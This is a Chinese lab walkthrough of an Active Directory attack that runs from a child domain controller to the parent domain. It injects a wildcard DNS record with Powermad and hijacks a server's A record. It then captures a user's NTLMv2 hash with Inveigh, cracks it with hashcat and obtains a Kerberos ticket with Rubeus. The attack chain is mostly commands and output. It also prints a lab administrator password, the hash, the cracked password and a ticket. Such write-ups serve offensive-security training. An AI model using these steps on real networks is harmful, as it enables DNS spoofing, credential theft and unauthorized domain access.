林内攻击-DNS Trust
1. 实验环境
- DC02(子域控制器)- 10.129.229.207(DHCP)/ 172.16.210.3(双网卡)
dev.inlanefreight.ad - DC01(父域控制器)- 172.16.210.99
inlanefreight.ad - DC02 的账号密码:
Administrator和HTB_@cademy_adm!
2. 介绍
DNS 信任攻击利用了授予 EDCs(企业域控制器)对各种 DNS 容器的权限。DNS 信任攻击涉及从子域内对父域任何数据库位置中的 DNS 记录进行未经授权的创建、删除和修改。可以进行DNS 欺骗 、DoS攻击、MiTM等攻击。
DNS 记录保存在AD的以下三个位置:
- DomainDnsZones 分区:
(CN=MicrosoftDNS,DC=DomainDnsZones,DC=root,DC=local) - ForestDnsZones 分区:
(CN=MicrosoftDNS,DC=ForestDnsZones,DC=root,DC=local) - 域分区:
(CN=MicrosoftDNS,CN=System,DC=root,DC=local)
子域控制器(DC)上的 SYSTEM 权限,可以更改父域的 DNS 记录
这些位置代表了 Active Directory 环境中存储和管理 DNS 记录的不同区域
3. DNS 通配符注入
当创建通配符记录时,DNS 服务器会利用该记录来响应那些与区域内任何特定记录都不精确匹配的名称请求。通配符记录充当了 DNS 查询的“全捕获”(catch-all)机制。如果请求的域名在 DNS 区域中没有精确匹配项,则将使用通配符记录来提供响应。这使得 DNS 服务器能够通过使用通配符条目作为默认响应,来处理对不存在或未定义的子域的请求。
攻击者可以利用通配符记录,通过创建与通配符模式相匹配的恶意 DNS 条目来重定向或操纵网络流量。这可能导致未经授权的访问、网络钓鱼攻击或敏感信息被拦截。
子域的 SYSTEM可以在父域中注入通配符记录(DC=*, DC=inlanefreight.ad, CN=MicrosoftDNS, DC=DomainDNSZones, DC=inlanefreight, DC=ad),并指向攻击者的IP。这样父域中所有不存在的DNS记录*.inlanefreight.ad都会指向攻击者设置的目标
3.1. 用Powermad新增DNS记录
下面是一个解析报错的例子:因为无法找到此DNS记录的目标
PS C:\Users\Administrator> Resolve-DNSName TEST1.inlanefreight.ad
Resolve-DNSName : TEST1.inlanefreight.ad : DNS name does not exist
At line:1 char:1
+ Resolve-DNSName TEST1.inlanefreight.ad
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (TEST1.inlanefreight.ad:String) [Resolve-DnsName], Win32Exception
+ FullyQualifiedErrorId : DNS_ERROR_RCODE_NAME_ERROR,Microsoft.DnsClient.Commands.ResolveDnsName
然后我们在父域的DNS A记录中添加上通配符*,这样不存在的域名就可以被解析到指定的IP地址了。
3.1.1. 为DC01添加DNS记录
这里用Powermad来帮我我们完成这个操作
首先需要SYSTEM权限
.\PsExec -s -i powershell
然后用Powermad添加DNS记录
PS C:\Users\Administrator\Documents> whoami
nt authority\system
PS C:\Users\Administrator\Documents> Import-module .\Powermad.ps1
PS C:\Users\Administrator\Documents> New-ADIDNSNode -Node * -domainController DC01.inlanefreight.ad -Domain inlanefreight.ad -Zone inlanefreight.ad -Tombstone -Verbose
VERBOSE: [+] Forest = INLANEFREIGHT.AD
VERBOSE: [+] Distinguished Name = DC=*,DC=inlanefreight.ad,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inlanefreight,DC=ad
VERBOSE: [+] Data = 172.16.210.3
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-82-00-00-00-00-00-02-58-00-00-00-00-D7-DE-38-00-AC-10-D2-03
[+] ADIDNS node * added
-
-Tombstone:用于将创建的通配符节点置于一种允许任何已认证用户对其进行修改或完全“墓碑化”(即标记为删除)的状态 - 注意这里没有使用
-Data 172.16.210.3参数显式指定任何 IP 地址,因为它会自动使用源 IP 地址。
3.1.2. 检测添加的DNS记录
然后可以发现新增了一条DNS记录
PS C:\Users\Administrator\Documents> Get-DnsServerResourceRecord -ComputerName DC01.inlanefreight.ad -ZoneName inlanefreight.ad
HostName RecordType Type Timestamp TimeToLive RecordData
-------- ---------- ---- --------- ---------- ----------
@ A 1 3/8/2026 1:00:00 AM 00:10:00 172.16.210.99
@ NS 2 0 01:00:00 dc01.inlanefreight.ad.
@ SOA 6 0 01:00:00 [130][dc01.inlanefreight.ad.][h...
* A 1 3/8/2026 1:00:00 AM 00:10:00 172.16.210.3_msdcs NS 2 0 01:00:00 dc01.inlanefreight.ad.
_gc._tcp.Default-First... SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][3268][dc02.dev.inlanef...
_gc._tcp.Default-First... SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][3268][dc01.inlanefreig...
3.1.3. 解析不存在的DNS记录
然后再测试一下解析,可以发现这个不存在的DNS记录TEST2.inlanefreight.ad 已经被解析到了我们的DC02172.16.210.3
PS C:\Users\Administrator\Documents> Resolve-DNSName TEST2.inlanefreight.ad
Name Type TTL Section IPAddress
---- ---- --- ------- ---------
TEST2.inlanefreight.ad A 599 Answer 172.16.210.3
3.2. 从子域修改父域的DNS 记录
除了可以新增DNS记录,我们还可以直接修改已存在的DNS记录
假设父域中有一个名为 DEV01 开发服务器,它托管着一个名为 dev_share 共享文件夹,用户通常使用路径 \\DEV01.INLANEFREIGHT.AD\dev_share 访问此共享文件夹。现在,如果攻击者设法控制了域 INLANEFREIGHT.AD 的 DNS 服务器,他就可以创建一个 DNS 记录(例如 A record ,将主机名 DEV01.INLANEFREIGHT.AD 重定向到攻击者指定的IP 地址。
当用户尝试访问 \\DEV01.INLANEFREIGHT.AD\dev_share 时,他们会在不知情的情况下被重定向到攻击者指定的 IP 地址。这种重定向为攻击者提供了拦截流量的机会。他们可以使用 Responder 或 Inveigh 等工具捕获尝试连接共享的用户的 NTLM 哈希值,从而使攻击者有可能未经授权访问敏感信息或提升其在网络中的权限。
3.2.1. 枚举父域DNS记录
需要SYSTEM
PS C:\Users\Administrator\Documents> Get-DnsServerResourceRecord -ComputerName DC01.inlanefreight.ad -ZoneName inlanefreight.ad
HostName RecordType Type Timestamp TimeToLive RecordData
-------- ---------- ---- --------- ---------- ----------
@ A 1 3/8/2026 1:00:00 AM 00:10:00 172.16.210.99
@ NS 2 0 01:00:00 dc01.inlanefreight.ad.
@ SOA 6 0 01:00:00 [135][dc01.inlanefreight.ad.][h...
* A 1 3/8/2026 1:00:00 AM 00:10:00 172.16.210.3
_msdcs NS 2 0 01:00:00 dc01.inlanefreight.ad.
_gc._tcp.Default-First... SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][3268][dc02.dev.inlanef...
_gc._tcp.Default-First... SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][3268][dc01.inlanefreig...
_kerberos._tcp.Default... SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][88][dc01.inlanefreight...
_ldap._tcp.Default-Fir... SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][389][dc01.inlanefreigh...
_gc._tcp SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][3268][dc02.dev.inlanef...
_gc._tcp SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][3268][dc01.inlanefreig...
_kerberos._tcp SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][88][dc01.inlanefreight...
_kpasswd._tcp SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][464][dc01.inlanefreigh...
_ldap._tcp SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][389][dc01.inlanefreigh...
_kerberos._udp SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][88][dc01.inlanefreight...
_kpasswd._udp SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][464][dc01.inlanefreigh...
dc01 A 1 0 01:00:00 172.16.210.99
dev NS 2 0 01:00:00 DC02.dev.INLANEFREIGHT.AD.
DC02.dev A 1 0 01:00:00 172.16.210.3
DEV01 A 1 0 01:00:00 172.16.210.7DomainDnsZones A 1 3/8/2026 1:00:00 AM 00:10:00 172.16.210.99
_ldap._tcp.Default-Fir... SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][389][dc01.inlanefreigh...
_ldap._tcp.DomainDnsZones SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][389][dc01.inlanefreigh...
ForestDnsZones A 1 3/8/2026 1:00:00 AM 00:10:00 10.129.229.207
ForestDnsZones A 1 3/8/2026 1:00:00 AM 00:10:00 172.16.210.99
ForestDnsZones A 1 3/8/2026 1:00:00 AM 00:10:00 172.16.210.3
ForestDnsZones AAAA 28 3/8/2026 1:00:00 AM 00:10:00 dead:beef::d3
ForestDnsZones AAAA 28 3/8/2026 1:00:00 AM 00:10:00 dead:beef::5440:97c9:17d0:acc3
_ldap._tcp.Default-Fir... SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][389][dc02.dev.inlanefr...
_ldap._tcp.Default-Fir... SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][389][dc01.inlanefreigh...
_ldap._tcp.ForestDnsZones SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][389][dc02.dev.inlanefr...
_ldap._tcp.ForestDnsZones SRV 33 3/8/2026 1:00:00 AM 00:10:00 [0][100][389][dc01.inlanefreigh...
从结果可以看出父域中的 DEV01 的 DNS 记录当前指向 IP 地址 172.16.210.7
3.2.2. 枚举 DEV01 的 DNS 记录
我们可以使用Resolve-DnsName对指向的名称进行DNS查询
PS C:\Users\Administrator\Documents> Resolve-DnsName -Name DEV01.inlanefreight.ad -Server DC01.INLANEFREIGHT.AD
Name Type TTL Section IPAddress
---- ---- --- ------- ---------
DEV01.inlanefreight.ad A 3600 Answer 172.16.210.7
3.2.3. 修改DEV01的DNS记录
然后我们修改DEV01的DNS记录,替换为子域的IP 172.16.210.3。此外,再把生存时间 (TTL) 设置调整到一个非常低的值,例如 1 秒,以确保更新后的记录能够快速传播到整个网络基础架构中。
PS C:\Users\Administrator\Documents> $Old = Get-DnsServerResourceRecord -ComputerName DC01.INLANEFREIGHT.AD -ZoneName inlanefreight.ad -Name DEV01
PS C:\Users\Administrator\Documents> $New = $Old.Clone()
PS C:\Users\Administrator\Documents> $TTL = [System.TimeSpan]::FromSeconds(1)
PS C:\Users\Administrator\Documents> $New.TimeToLive = $TTL
PS C:\Users\Administrator\Documents> $New.RecordData.IPv4Address = [System.Net.IPAddress]::parse('172.16.210.3')
PS C:\Users\Administrator\Documents> Set-DnsServerResourceRecord -NewInputObject $New -OldInputObject $Old -ComputerName DC01.INLANEFREIGHT.AD -ZoneName inlanefreight.ad
PS C:\Users\Administrator\Documents> Resolve-DnsName -Name DEV01.inlanefreight.ad -Server DC01.INLANEFREIGHT.AD
Name Type TTL Section IPAddress
---- ---- --- ------- ---------
DEV01.inlanefreight.ad A 1 Answer 172.16.210.3可以发现DEV01的记录已经变成了172.16.210.3 ,且TTL也变成了1
3.2.4. 使用Inveigh捕获身份验证
然后我们使用Inveigh来进行捕获尝试访问\\DEV01.INLANEFREIGHT.AD\dev_share 的用户的 NTLM 哈希
PS C:\Users\Administrator\Documents> .\Inveigh.exe
[*] Inveigh 2.0.11 [Started 2026-03-08T01:54:35 | PID 1948]
[+] Packet Sniffer Addresses [IP 172.16.210.3 | IPv6 fe80::dcc7:cfe1:1414:803d%14]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.16.210.3 | IPv6 fe80::dcc7:cfe1:1414:803d%14]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Users\Administrator\Documents]
[+] Previous Session Files (Not Found)
[*] Press ESC to enter/exit interactive console
[!] Failed to start LDAP listener on port 389, check IP and port usage.
[!] Failed to start LDAP listener on port 389, check IP and port usage.
[.] [01:54:52] TCP(9389) SYN packet from 172.16.210.99:55028
[.] [01:54:52] TCP(88) SYN packet from 172.16.210.99:55029
[.] [01:55:03] TCP(445) SYN packet from 172.16.210.99:55033
[.] [01:55:03] SMB1(445) negotiation request detected from 172.16.210.99:55033
[.] [01:55:03] SMB2+(445) negotiation request detected from 172.16.210.99:55033
[+] [01:55:03] SMB(445) NTLM challenge [9127D43FC5E0FEAD] sent to 172.16.210.3:55033
[+] [01:55:03] SMB(445) NTLMv2 captured for [INLANEFREIGHT\buster] from 172.16.210.99(DC01):55033:
buster::INLANEFREIGHT:9127D43FC5E0FEAD:CF98DB1C091401D651D9A895B7F20AA5:01010000000000007DB0F0DED0AEDC01844B3E0ADC2413FA0000000002000600440045005600010008004400430030003200040028006400650076002E0049004E004C0041004E00450046005200450049004700480054002E00410044000300320044004300300032002E006400650076002E0049004E004C0041004E00450046005200450049004700480054002E00410044000500200049004E004C0041004E00450046005200450049004700480054002E0041004400070008007DB0F0DED0AEDC01060004000200000008003000300000000000000000000000002100006C18F17A7E51552371009E4BF497B01778A8A5384A693B4D857ADF6587A368E80A001000000000000000000000000000000000000900360063006900660073002F00440045005600300031002E0049004E004C0041004E00450046005200450049004700480054002E00410044000000000000000000
[!] [01:55:03] SMB(445) NTLMv2 for [INLANEFREIGHT\buster] written to Inveigh-NTLMv2.txt
[.] [01:55:21] TCP(135) SYN packet from 172.16.210.99:55047
[.] [01:55:21] TCP(49667) SYN packet from 172.16.210.99:55048
[.] [01:55:22] TCP(135) SYN packet from 172.16.210.99:55060
[ ] [01:55:22] mDNS(QM)(ANY) request [DC01.local] from fe80::4d96:7693:5432:5980%14 [disabled]
[ ] [01:55:22] mDNS(QM)(ANY) request [DC01.local] from 172.16.210.99 [disabled]
[-] [01:55:22] LLMNR(ANY) request [DC01] from fe80::4d96:7693:5432:5980%14 [type ignored]
[-] [01:55:22] LLMNR(ANY) request [DC01] from 172.16.210.99 [type ignored]
[+] [01:55:23] DNS(A) request [ctldl.windowsupdate.com] from 172.16.210.99 [response sent]
[.] [01:55:23] TCP(80) SYN packet from 172.16.210.99:55075
[.] [01:55:24] HTTP(80) GET request from 172.16.210.99:55075 for /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9a1d8b97967143ac
[.] [01:55:24] HTTP(80) host header ctldl.windowsupdate.com from 172.16.210.99:55075
[.] [01:55:24] HTTP(80) user agent from 172.16.210.99:55075:
Microsoft-CryptoAPI/10.0
3.2.5. 破解 NTLMv2 哈希
BUSTER::INLANEFREIGHT:9127d43fc5e0fead:cf98db1c091401d651d9a895b7f20aa5:01010000000000007db0f0ded0aedc01844b3e0adc2413fa0000000002000600440045005600010008004400430030003200040028006400650076002e0049004e004c0041004e00450046005200450049004700480054002e00410044000300320044004300300032002e006400650076002e0049004e004c0041004e00450046005200450049004700480054002e00410044000500200049004e004c0041004e00450046005200450049004700480054002e0041004400070008007db0f0ded0aedc01060004000200000008003000300000000000000000000000002100006c18f17a7e51552371009e4bf497b01778a8a5384a693b4d857adf6587a368e80a001000000000000000000000000000000000000900360063006900660073002f00440045005600300031002e0049004e004c0041004e00450046005200450049004700480054002e00410044000000000000000000:hunter
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: BUSTER::INLANEFREIGHT:9127d43fc5e0fead:cf98db1c0914...000000
Time.Started.....: Sun Mar 08 15:59:03 2026 (0 secs)
Time.Estimated...: Sun Mar 08 15:59:03 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 90062.7 kH/s (2.55ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1572864/14344388 (10.97%)
Rejected.........: 0/1572864 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> lindarules
Hardware.Mon.#01.: Temp: 38c Util: 30% Core:1890MHz Mem:7001MHz Bus:8
3.2.6. 使用Rubeus获取tgt
*Evil-WinRM* PS C:\Users\Administrator\Documents> ./Rubeus.exe asktgt /user:buster /password:hunter /domain:inlanefreight.ad /ptt /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 2BDCAD6D2082323222A291328AB4883E
[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.ad\buster'
[*] Using domain controller: 172.16.210.99:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFljCCBZKgAwIBBaEDAgEWooIEoTCCBJ1hggSZMIIElaADAgEFoRIbEElOTEFORUZSRUlHSFQuQUSiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEGlubGFuZWZyZWlnaHQuYWSjggRRMIIETaADAgESoQMCAQKiggQ/BIIEO1v7CeGB9upYJirvwT1k2nJNr/keYpX/7ykrvd7JSdZ4rUcq0S7B+KKcHHeYWhbtB7ksSVAESFMDrSu1Nw8FbcKGwbrmbCga2e2kKMpVyAVfDGFF2jxyAMSdrR9mpW7ChZwORKPrXCfrxQN2vtiSaBC6Gp7NksnNI9jH6hpdzKRs89nnQ29RhtEL0X0ofFROPKYXoYSxQMUitPjHYLImFZAmlLXDBI9hCHei5y7fCwc4zCsOTWESPDYulEOaD0RjidlhfHGNG0KKButU8AeWwv1IjYXpufkDyGsJ2dsWtIJZCRPh7dar6M8KXSBYV07wflnzggD31I1g5EbR9AHz3HQnYaR1MjejrGDssAcMJau+CN9TTvvrhZfLQWGUeXbsapn+4Y/I/GMc2WZm5iu11pOT30DntlCCV0p7dS7aB8Zh0dR/FpaBHtl4nBMVe9jexagML6iWfFLwP0Rc2io1HreKBkWiN502ZdIyiJeXUPp4LGS3p6yq5bn1X9+4sjNwoYwMv6hzMTUCZFm2NTqBLTSfnfo10LEaYy8/DT68W20SR/JiD5JPOsHTOjzZk7tw7XaF+zTfVPNtI9yC9rWBm/dIwxus0udGPnBw0w6Os7US9GT7acjnZ5fgYngnSLlJGi5hYGLRyuv31ROsYfCdkAGUX+UEeeWG9GtOmwIFYK10WQFAb1rjvUvtEcT22fBqzhK8YwE75s6cNeB9DUAUXpJJbZgTlsiCntJPeG2KjhzPa+2UEnkI+OqBB/k/lWxFnNTsX1NXxSzG9O3Cl4IbGNpPKdjalKH0OUnHSBxvw1Rd0sAMsceZjXhviXBvhMW0qlCmNQqJP3hvIo8CwbIu0GmhnjyixDy8mQd8KFTNfskh9HV3jePnDGAZ/bjdQMtVJHfXolv7UOPnqzgo4cTqNLWt3Qv0sS1HhfjjJbG7+onytnlILOlo2addFmMBsQc6FlAOWUpSd8zGBGwyHzlil4LWER/u6E3qqOq16C37L8bActwCOK+OE1Bbf1R9w1zNK+vJKdj6D8bHna3NThKWUIJS8Zc+ZVouHYqce0HI6BepgUqfuP4AqMyiFv0XojTS4Dsuoe4+0Ncwn33Ca7Oeb1FJSZx6brPtF2BW5PnmuN7gl6jOf1kEwXVsHna8gRwgtAD1bn2V+mefTliL/OPck+pn2lVFFIDWb/pMr6vYDPMM/BwFiJHZNBtgALKovlTr4o5pUOGEwEMl1bRnNcfasrd/MZ0PP4plngy+YoI7bKJIs0/pxWYA5fp7w+4WhCCiMoaO39/dcSBf2tBDJcVA9EXSd6SNtwoQ4D+sIYeEPc2kZDR9kwXQdf8CGr9lO0mKNnsMpsaz18Tcdorv0VRJ7zoeIHPNBhfmCqUosqH3vHAgPDu4uLbKT1iBeus3DkR1DV4svkHjYKyItvQ5SZfjAdDWmN4hXIEDoTo1A6OB4DCB3aADAgEAooHVBIHSfYHPMIHMoIHJMIHGMIHDoBswGaADAgEXoRIEEOFbmWyMOzap8Z2CiP1KVkehEhsQSU5MQU5FRlJFSUdIVC5BRKITMBGgAwIBAaEKMAgbBmJ1c3RlcqMHAwUAQOEAAKURGA8yMDI2MDMwODA4MDAzNVqmERgPMjAyNjAzMDgxODAwMzVapxEYDzIwMjYwMzE1MDgwMDM1WqgSGxBJTkxBTkVGUkVJR0hULkFEqSUwI6ADAgECoRwwGhsGa3JidGd0GxBpbmxhbmVmcmVpZ2h0LmFk
[+] Ticket successfully imported!
ServiceName : krbtgt/inlanefreight.ad
ServiceRealm : INLANEFREIGHT.AD
UserName : buster (NT_PRINCIPAL)
UserRealm : INLANEFREIGHT.AD
StartTime : 3/8/2026 3:00:35 AM
EndTime : 3/8/2026 1:00:35 PM
RenewTill : 3/15/2026 3:00:35 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 4VuZbIw7NqnxnYKI/UpWRw==
ASREP (key) : 2BDCAD6D2082323222A291328AB4883E